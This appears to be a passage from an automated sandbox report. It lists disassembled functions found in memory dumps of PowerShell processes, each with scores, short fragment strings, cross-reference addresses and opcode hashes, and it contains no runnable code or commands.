Instruction Fuzzy Hash: 23B09230084708CFC2486F79A4049147329EF4521978004ECE91E1A2928F36E889CA45

Non-executed Functions

Function 07C71BE0 Relevance: 20.4, Strings: 16, Instructions: 393COMMON

Download Yara Rule

Strings

84Ul, xrefs: 07C71F76
4']q, xrefs: 07C71F95
JXl, xrefs: 07C720C2
$cJk, xrefs: 07C720B4
rWl, xrefs: 07C71C5D
tP]q, xrefs: 07C71FEB
rWl, xrefs: 07C71C53
4']q, xrefs: 07C71C86
4']q, xrefs: 07C71C92
JXl, xrefs: 07C72017
JXl, xrefs: 07C720CE
tP]q, xrefs: 07C71FDF
84Ul, xrefs: 07C71F6C
JXl, xrefs: 07C7200B
JXl, xrefs: 07C71FA1
4']q, xrefs: 07C71F89

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: $cJk$4']q$4']q$4']q$4']q$84Ul$84Ul$tP]q$tP]q$JXl$JXl$JXl$JXl$JXl$rWl$rWl
API String ID: 0-1556771180
Opcode ID: d38b3134ef6936d93d428ce73a7f10c3a65f5a6fd10bc20e61543c9b6bf209f0
Instruction ID: bbc8ee11c1a761293667411786607638abf1e77a481cebaed2347aa82abbf035
Opcode Fuzzy Hash: d38b3134ef6936d93d428ce73a7f10c3a65f5a6fd10bc20e61543c9b6bf209f0
Instruction Fuzzy Hash: D6D157B1B0420A8FCB259B6D988066ABBF6EFC5311F18C4BBC9558B251DF31CA45C7A1

Function 07C70FDD Relevance: 20.3, Strings: 16, Instructions: 294COMMON

Download Yara Rule

Strings

$]q, xrefs: 07C71263
84Ul, xrefs: 07C710DE
`Q]q, xrefs: 07C71153
`Q]q, xrefs: 07C7115F
$]q, xrefs: 07C71229
tP]q, xrefs: 07C71133
`Q]q, xrefs: 07C710ED
`Q]q, xrefs: 07C71193
tP]q, xrefs: 07C71127
$]q, xrefs: 07C71081
fbq, xrefs: 07C710A2
$]q, xrefs: 07C71065
84Ul, xrefs: 07C710D4
$]q, xrefs: 07C71253
$]q, xrefs: 07C71239
$]q, xrefs: 07C71044

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: fbq$84Ul$84Ul$`Q]q$`Q]q$`Q]q$`Q]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1392853946
Opcode ID: ed1eb5ba272cd8306d65817f25f4092d59cce25e1133eddb2df81abf72ca18c6
Instruction ID: a70bcc54a95e83ecfd35d4255e0588d100dad8f451d6a4b3337234f780bc559e
Opcode Fuzzy Hash: ed1eb5ba272cd8306d65817f25f4092d59cce25e1133eddb2df81abf72ca18c6
Instruction Fuzzy Hash: 5FB106B065020EDFCB249F69C884AAA7BF6FFC5351F188465E8018B291CF35DE55CBA1

Function 07C73928 Relevance: 12.8, Strings: 10, Instructions: 325COMMON

Download Yara Rule

Strings

Ml, xrefs: 07C73A1D
$]q, xrefs: 07C7393A
$]q, xrefs: 07C73960
tP]q, xrefs: 07C739A5
4']q, xrefs: 07C73B29
tP]q, xrefs: 07C739B1
$]q, xrefs: 07C7396C
4']q, xrefs: 07C73B35
Ml, xrefs: 07C73A0F
$]q, xrefs: 07C73C0E

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$Ml$Ml
API String ID: 0-3507995532
Opcode ID: 5b6c01c68521bfa78ae92fa1d67807f18e4179f7f3996d3746aeccfb1b31c033
Instruction ID: abceaf3e7bf0d80bac19c2ecf372be3f47220656c8c5201035904c581aaf7f72
Opcode Fuzzy Hash: 5b6c01c68521bfa78ae92fa1d67807f18e4179f7f3996d3746aeccfb1b31c033
Instruction Fuzzy Hash: 38A17AB23043D58FCB259A799881766BBE6EFC2720F1484ABD845CB352CE31CD45C7A1

Function 04DBEB38 Relevance: 10.2, Strings: 8, Instructions: 181COMMON

Download Yara Rule

Strings

0o@p, xrefs: 04DBECC7
$]q, xrefs: 04DBECBB
,aq, xrefs: 04DBEB8D
$]q, xrefs: 04DBECD5
$]q, xrefs: 04DBEC30
$]q, xrefs: 04DBECEF
$]q, xrefs: 04DBEC87
$]q, xrefs: 04DBECA1

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID: ,aq$0o@p$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3294546130
Opcode ID: 72b53ff03e78e059277315d70919744648f5b8e6f7843b4f5d8146ec3f8f9f06
Instruction ID: 64668c9414da980724243c302bcb04b308ac59fcab062e922ed2159debd12b89
Opcode Fuzzy Hash: 72b53ff03e78e059277315d70919744648f5b8e6f7843b4f5d8146ec3f8f9f06
Instruction Fuzzy Hash: 3E513C30784454CFC72AAB7D99549EC7BD7BF88A5131008AAD497CB371EE68ED4087E2

Function 07C70488 Relevance: 9.2, Strings: 7, Instructions: 487COMMON

Download Yara Rule

Strings

4']q, xrefs: 07C7096E
rWl, xrefs: 07C70935
4']q, xrefs: 07C705F6
4']q, xrefs: 07C70962
fbq, xrefs: 07C7094B
4']q, xrefs: 07C705EC
rWl, xrefs: 07C7092B

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: fbq$4']q$4']q$4']q$4']q$rWl$rWl
API String ID: 0-538611561
Opcode ID: a4e8fa2f6acbee9859c4bee14c3d950ca94fe0ca87a6b98fdef670a5876f52f7
Instruction ID: 933147a5719a38380d2ca5c902c6fb805c80fc635a7f4ca5dfd6bc6d136f46ca
Opcode Fuzzy Hash: a4e8fa2f6acbee9859c4bee14c3d950ca94fe0ca87a6b98fdef670a5876f52f7
Instruction Fuzzy Hash: 31F177B17042158FCB259B68D850BAABBA2EFC2211F14C4BBD945CB252DF31D986C7A1

Function 04DBED68 Relevance: 9.2, Strings: 7, Instructions: 453COMMON

Download Yara Rule

Strings

0o@p, xrefs: 04DBF185
`Q]q, xrefs: 04DBF27C
0o@p, xrefs: 04DBF1C3
$]q, xrefs: 04DBF2A6
$]q, xrefs: 04DBF090
0o@p, xrefs: 04DBF1B7
$]q, xrefs: 04DBF0EC

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID: 0o@p$0o@p$0o@p$`Q]q$$]q$$]q$$]q
API String ID: 0-2772630205
Opcode ID: d4a6ba4d731b92811701348c608dc9840b5048b81ab18669fd1a98fb4d1251e7
Instruction ID: 3d3b58520564a60efc02750b51fc9d8fc8240507a84723f8b70eb98b734a9cbc
Opcode Fuzzy Hash: d4a6ba4d731b92811701348c608dc9840b5048b81ab18669fd1a98fb4d1251e7
Instruction Fuzzy Hash: D4E1C030740110CFD7289F798C146AE67EAAFC9B54B2444AED887DB3A4EE74EC4187E1

Function 07C73678 Relevance: 8.9, Strings: 7, Instructions: 183COMMON

Download Yara Rule

Strings

Ml, xrefs: 07C7386D
4']q, xrefs: 07C7372E
Ml, xrefs: 07C7387B
$]q, xrefs: 07C7382A
$]q, xrefs: 07C73836
4']q, xrefs: 07C73722
$]q, xrefs: 07C737FF

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$Ml$Ml
API String ID: 0-1672596896
Opcode ID: 0e14da5bcc1ac81d33a365cff56481cad2555c06346fc3c91eeff70e83d0389f
Instruction ID: 591ff1cd85274b693e6f6d75478988e42a331c91be8cc858262b7233e876f67d
Opcode Fuzzy Hash: 0e14da5bcc1ac81d33a365cff56481cad2555c06346fc3c91eeff70e83d0389f
Instruction Fuzzy Hash: D85167F27003C68FCB245A7A894076ABBE6EFC2620F24846BD845CF251DF35C941D7A1

Function 07C72107 Relevance: 7.6, Strings: 6, Instructions: 68COMMON

Download Yara Rule

Strings

JXl, xrefs: 07C7214A
JXl, xrefs: 07C72156
$]q, xrefs: 07C72166
JXl, xrefs: 07C720C2
$cJk, xrefs: 07C720B4
$]q, xrefs: 07C72172

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: $cJk$$]q$$]q$JXl$JXl$JXl
API String ID: 0-2938938478
Opcode ID: 4b80efb2460f20a4ab16f370c6cbbe8f31378fa4a87fc91be85f63fcf9ba91a6
Instruction ID: bfd09df3dddc649b10fb25d8bf3e0b3ec00fa38e00a53806786ec2699cb9c844
Opcode Fuzzy Hash: 4b80efb2460f20a4ab16f370c6cbbe8f31378fa4a87fc91be85f63fcf9ba91a6
Instruction Fuzzy Hash: E5113BF26093528FC336062C5C505537BB6FFD2A11B1985A7C980CF26ACE398D49C362

Function 04DB7A09 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

`^q, xrefs: 04DB7B8A
`^q, xrefs: 04DB7B0B
`^q, xrefs: 04DB7CAA
`^q, xrefs: 04DB7C2C
tMWl, xrefs: 04DB7ABC

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID: tMWl$`^q$`^q$`^q$`^q
API String ID: 0-643008544
Opcode ID: 86f919a37e61168164677bfb4b7cd489fb76f09110088892d08a497a1267deb7
Instruction ID: 65c5f52b660ff61db756684f41eead35a8e2abf36101e475b22e319a97ca1ab8
Opcode Fuzzy Hash: 86f919a37e61168164677bfb4b7cd489fb76f09110088892d08a497a1267deb7
Instruction Fuzzy Hash: 15B19374E002099FDB55DFA9D990A9DFBF6FF88304F10862AD819AB314DB34A945CF90

Function 04DB7A18 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 04DB7B8A
`^q, xrefs: 04DB7B0B
`^q, xrefs: 04DB7CAA
`^q, xrefs: 04DB7C2C
tMWl, xrefs: 04DB7ABC

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID: tMWl$`^q$`^q$`^q$`^q
API String ID: 0-643008544
Opcode ID: 3c4e9e95f71282202f67a5a007d6a7825b68802fa5fb8770f05c78b13662711d
Instruction ID: 2886223c6ec355dcc9622e0be1b51c992bea4fa66c7c1f8aebf537d87f5a8e85
Opcode Fuzzy Hash: 3c4e9e95f71282202f67a5a007d6a7825b68802fa5fb8770f05c78b13662711d
Instruction Fuzzy Hash: 36B17074E002099FDB55DFA9D990A9DFBF6FF88304F10862AD819AB314DB34A945CF90

Function 07C72207 Relevance: 6.3, Strings: 5, Instructions: 58COMMON

Download Yara Rule

Strings

JXl, xrefs: 07C72251
TcJk, xrefs: 07C721F2
JXl, xrefs: 07C72245
lcJk, xrefs: 07C72237
JXl, xrefs: 07C721BA

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: TcJk$lcJk$JXl$JXl$JXl
API String ID: 0-221306398
Opcode ID: 4487b009dd7a502ea10f38e2ad58018534739fb292c2d0cf68d28318c3b48991
Instruction ID: 37a215a66d55ff94c6edb622ffcdb90c33db9cd0f04560665dc57094173702cb
Opcode Fuzzy Hash: 4487b009dd7a502ea10f38e2ad58018534739fb292c2d0cf68d28318c3b48991
Instruction Fuzzy Hash: 16113AB16093519FC71546284C619A37F76BFD3710B0584E7C590DF6A6CE358D89C3A2

Function 04DB7208 Relevance: 5.2, Strings: 4, Instructions: 181COMMON

Download Yara Rule

Strings

`^q, xrefs: 04DB7B8A
`^q, xrefs: 04DB7B0B
`^q, xrefs: 04DB7CAA
`^q, xrefs: 04DB7C2C

Memory Dump Source

Source File: 00000007.00000002.2150655121.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4db0000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: edfbbe04005f40aabb3d25593059262374f7988e2079ad95eda20022c07d13ba
Instruction ID: 029fceef3168d62e6f67192a0b8707c8f73081ed7a9c6e7be88d4e9342368cd7
Opcode Fuzzy Hash: edfbbe04005f40aabb3d25593059262374f7988e2079ad95eda20022c07d13ba
Instruction Fuzzy Hash: 49815F74E012199FDB55DFA9D990A9DFBF2BF88300F20862AD819AB314D734A945CF90

Function 07C75798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 07C757F4
$]q, xrefs: 07C757AA
$]q, xrefs: 07C75800
$]q, xrefs: 07C757C6

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: d4f84d4a309a4156dcf8c28b0217cd3cdd16fe037070b7692754e0613c822319
Instruction ID: 07ee090daf5be82441ffe6568c82254d796a980a8825fbd4cb79b9a294dc8747
Opcode Fuzzy Hash: d4f84d4a309a4156dcf8c28b0217cd3cdd16fe037070b7692754e0613c822319
Instruction Fuzzy Hash: 612149B17503129BDB38593AA881B27BBDAABC0711F64842AA909CB381DE36C951C361

Function 07C70309 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

$]q, xrefs: 07C70352
4']q, xrefs: 07C70373
4']q, xrefs: 07C7037F
$]q, xrefs: 07C7035E

Memory Dump Source

Source File: 00000007.00000002.2165520085.0000000007C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7c70000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 86090b70035830451cb01e3d128eb097278ebab70ac89622fcc01bea0b73acab
Instruction ID: b126fb7007c1ec33e8b6a8b8a240cf8d72f3eeba86b101f03a900e5e2956934b
Opcode Fuzzy Hash: 86090b70035830451cb01e3d128eb097278ebab70ac89622fcc01bea0b73acab
Instruction Fuzzy Hash: 2C01AD6170D3864FC33B123D18A45666FB6AFC3A5076E45E7C480CF2A7CD198D8AC3A6

Analysis Process: powershell.exePID: 3292, Parent PID: 6592COMMON

Executed Functions

Function 0462B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON

Download Yara Rule

Strings

YHn^, xrefs: 0462B557
{YHn^, xrefs: 0462B6F0, 0462B6F5

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID: {YHn^$YHn^
API String ID: 0-2673008209
Opcode ID: 33326c9d54201fafdbb133233bd8afbd5d9b8f6bdf97ecd8b9c3ac09b3a648bb
Instruction ID: cec90256c615e0770e05ff7f2ee4bf0bc974734f724e7c38b27a56c6067ee5d9
Opcode Fuzzy Hash: 33326c9d54201fafdbb133233bd8afbd5d9b8f6bdf97ecd8b9c3ac09b3a648bb
Instruction Fuzzy Hash: 4C9152B1F006295BDB19EFB484106AEB7E2DF84704B04C959D54AAB340EF74A906CFD6

Function 07492308 Relevance: 14.4, Strings: 11, Instructions: 639COMMON

Download Yara Rule

Strings

JXl, xrefs: 074923C5
4']q, xrefs: 07492619
JXl, xrefs: 0749259E
JXl, xrefs: 074925F6
rWl, xrefs: 0749254F
JXl, xrefs: 074923D1
JXl, xrefs: 0749237F
4']q, xrefs: 0749260D
rWl, xrefs: 07492559
JXl, xrefs: 074925EA
|,!k, xrefs: 074925DB

Memory Dump Source

Source File: 00000009.00000002.2212395010.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$|,!k$JXl$JXl$JXl$JXl$JXl$JXl$rWl$rWl
API String ID: 0-1009563007
Opcode ID: 86bb955f83c30b9a71ce1dc07054df31e4477a32d389adeaed1b927bc934808a
Instruction ID: 93b5050c13026d5392ad8db47e4c848841f73738d14c140a5597b23bbd15f9c4
Opcode Fuzzy Hash: 86bb955f83c30b9a71ce1dc07054df31e4477a32d389adeaed1b927bc934808a
Instruction Fuzzy Hash: E322E3B1B00216AFCF259B6888506EBBFE6FF86310F0484BBD8059B251DB75DD45CBA1

Function 07493CE8 Relevance: 5.6, Strings: 4, Instructions: 594COMMON

Download Yara Rule

Strings

4']q, xrefs: 07494180
4']q, xrefs: 07494030
4']q, xrefs: 0749418A
4']q, xrefs: 07494026

Memory Dump Source

Source File: 00000009.00000002.2212395010.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7490000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: f789d93a9c54e03d3159cf7535ab2f375a093ea45199a415de30508ab339263f
Instruction ID: 8b873ab7dd2b5a56ba7423cee356669650646cf10b1159f8a5608855cfa6952e
Opcode Fuzzy Hash: f789d93a9c54e03d3159cf7535ab2f375a093ea45199a415de30508ab339263f
Instruction Fuzzy Hash: 501213B1704251CFCF259A6CD8116ABBFA6AF82610F1488BBD505CB391DB36CD46CBA1

Function 0462E5B9 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

JXl, xrefs: 0462E6EA

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID: JXl
API String ID: 0-1614082895
Opcode ID: 43d8bc4b27c55fe81f427e99fcf8c6b6b6a2029bc25f77d979b82072397ca5e1
Instruction ID: 8ae28f40dec471820e9ff19be532831a9d2f64123211ffc7ca8832fb16924ad5
Opcode Fuzzy Hash: 43d8bc4b27c55fe81f427e99fcf8c6b6b6a2029bc25f77d979b82072397ca5e1
Instruction Fuzzy Hash: 8A418C70E00209AFCB15DF68D994A9DBBF6FF49340F1489A9D409AB350EB34AD05CF90

Function 04626FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

(aq, xrefs: 04627105

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: c434b3389cbba37a4327ff8618d26771683045e2c1474de3b1af3cae6a163fb6
Instruction ID: 48deb773b696788e3dffcf23027fd91b774a44d8390acb26f86d07749a1fbe03
Opcode Fuzzy Hash: c434b3389cbba37a4327ff8618d26771683045e2c1474de3b1af3cae6a163fb6
Instruction Fuzzy Hash: D7415C74B042158FDB14DFA8C558AAEBBF1AF8D311F144499D806AB391EB35EC05CF61

Function 0462E610 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

JXl, xrefs: 0462E6EA

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID: JXl
API String ID: 0-1614082895
Opcode ID: 9e4771ab108906582e4e552ec103fa0dc9fdbfd974ba0b12d323b67cc9a7261c
Instruction ID: 7056685f6d7c01e03b6a4c462cd9e6e3494db4936de851988a13f76a88bf27b9
Opcode Fuzzy Hash: 9e4771ab108906582e4e552ec103fa0dc9fdbfd974ba0b12d323b67cc9a7261c
Instruction Fuzzy Hash: BB419830A00605DFCB15DF68DA94A9EBBF6FF49340F148969D40AAB391EB34AD05CF90

Function 0462E640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

JXl, xrefs: 0462E6EA

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID: JXl
API String ID: 0-1614082895
Opcode ID: d225e0eb15fdbd821c09736222af86c73acff3c37cd51e112b8528b4d87f3d75
Instruction ID: 0f7f1366e5f592ea44dbea6bad38aea654a7fcd4658a72f754b834f8d4154ade
Opcode Fuzzy Hash: d225e0eb15fdbd821c09736222af86c73acff3c37cd51e112b8528b4d87f3d75
Instruction Fuzzy Hash: 7731AE30A00615DFCB14DF69D994A9EBBF6FF48340F148969D40AAB394EB34AD05CF90

Function 0462AF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

(&]q, xrefs: 0462AFBA

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID: (&]q
API String ID: 0-1343553580
Opcode ID: dfbd14b5f1ee6a418f0058c9e7698de97c006e4e9efc823567f0a56181161f57
Instruction ID: 4bf99249f4dbb702f6f72c3fd23959793025dccbe6af2e484bfb02a51ddf0a82
Opcode Fuzzy Hash: dfbd14b5f1ee6a418f0058c9e7698de97c006e4e9efc823567f0a56181161f57
Instruction Fuzzy Hash: A721BC71A002588FCB14DFAED5407AFBBF5EF89320F14846AD508E7340CA79A8058FE5

Function 046229F0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fd28f0ed928313c1b18c114a3bdf6d1b8b9a7d9637e01f2eefbd72487a91891
Instruction ID: 106fe34ce68fc336aa8100fbfaeee2d665ab85a3212eca0e3b230c35f8dbae89
Opcode Fuzzy Hash: 2fd28f0ed928313c1b18c114a3bdf6d1b8b9a7d9637e01f2eefbd72487a91891
Instruction Fuzzy Hash: 1B919974A00605AFCB15CF58C5D49AAFBB1FF48310B2485A9D915AB364D736FC91CFA0

Function 0462BAB0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 628886a2f00c7a1dcf3523ac42144be2855d60ecff62b889ae9d405e46d4f300
Instruction ID: 7bac3209cd8cc18fe4a99d29a3f21709056815ecb873225da5692d1ae6ab31af
Opcode Fuzzy Hash: 628886a2f00c7a1dcf3523ac42144be2855d60ecff62b889ae9d405e46d4f300
Instruction Fuzzy Hash: 226127B1E00258DFDB14DFA9D584A9DBBF5FF88710F14806AE819AB364EB34A845CF50

Function 04627740 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6719fbe578331aee90025f35ec34a3971a40f8ffe7cce4549b925451897fdc9
Instruction ID: 77ead96e34781624809f419879f3990ad915f907466ddb5260ad71b79360e510
Opcode Fuzzy Hash: e6719fbe578331aee90025f35ec34a3971a40f8ffe7cce4549b925451897fdc9
Instruction Fuzzy Hash: 6651C034304215AFD7059B79D954E2A7BEAFF89316F1544BAE405CB352EB35EC02CBA0

Function 0462BAC0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcb3510fe652a6a503318ebea2c531ed95e389ce5bb236047b8c909316aceff8
Instruction ID: 0085c8fb1a8c168d51fd64b423330b90d9652ee724bff0a9142c133de0fa566e
Opcode Fuzzy Hash: bcb3510fe652a6a503318ebea2c531ed95e389ce5bb236047b8c909316aceff8
Instruction Fuzzy Hash: 456116B1E00658DFDB14DFA9C584A9DBBF5EF88710F14816AE818AB364EB34AC45CF50

Function 0462E419 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78fc443817b01f86cba027695d63a5b5441c4170f680caffd74e5df1e296569c
Instruction ID: 1d831a8e7f2deb6ea313f216955f96938f0753abfa8e9c54543e747752304f3e
Opcode Fuzzy Hash: 78fc443817b01f86cba027695d63a5b5441c4170f680caffd74e5df1e296569c
Instruction Fuzzy Hash: 22518DB4B007159FDB14DF6CD69496ABBE6EF9830071884A9E509CF365EB31EC028F91

Function 0462E428 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e973325cfe501f0806431cc3843503a9b5f4994690b6fe4f68ca0055fa942d
Instruction ID: 00751fe2c563d7aa37c430a158c2e3bce596f909ef0236a67cb7dd76b1cf7f75
Opcode Fuzzy Hash: 00e973325cfe501f0806431cc3843503a9b5f4994690b6fe4f68ca0055fa942d
Instruction Fuzzy Hash: 30416FB4B007159FDB14DF6CC69492ABBE6EF983047148469E509DF365EB31EC028F91

Function 04626FB0 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21fce4f977bf7156be2cd0eb043f9e3cd7a63cbdcfe2cfec2005fa4d9e7307b8
Instruction ID: 6df883b82edbd78ded33807bd8e43c1f6694fd27f9c8049ca2160a8cff232f8f
Opcode Fuzzy Hash: 21fce4f977bf7156be2cd0eb043f9e3cd7a63cbdcfe2cfec2005fa4d9e7307b8
Instruction Fuzzy Hash: DC41A074A042559FCB14CF64C958AAEBBF1EF8D311F1440A9D841AB391EB31EC06CF61

Function 04622B00 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2185731333.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4620000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3357fdc4edea9ced7e3b7eef0e2e2b0d24254a21d17190c631268675d2e66cb
Instruction ID: c648d0a82b97aa8500fd999a89ad5ee6740ecc2a3283d8d462f78fca0aa87cc3
